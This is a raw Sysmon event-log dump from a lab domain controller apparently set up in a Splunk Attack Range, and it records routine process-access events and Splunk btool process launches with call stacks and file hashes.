13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AD00-00000000A301}3920C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8EE2-6005-AC00-00000000A301}22962440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE2-6005-AD00-00000000A301}3920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.546{59A5CD1D-8EE2-6005-AD00-00000000A301}3920C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8EE2-6005-AB00-00000000A301}39002608C:\Windows\system32\cmd.exe{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000003514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.540{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
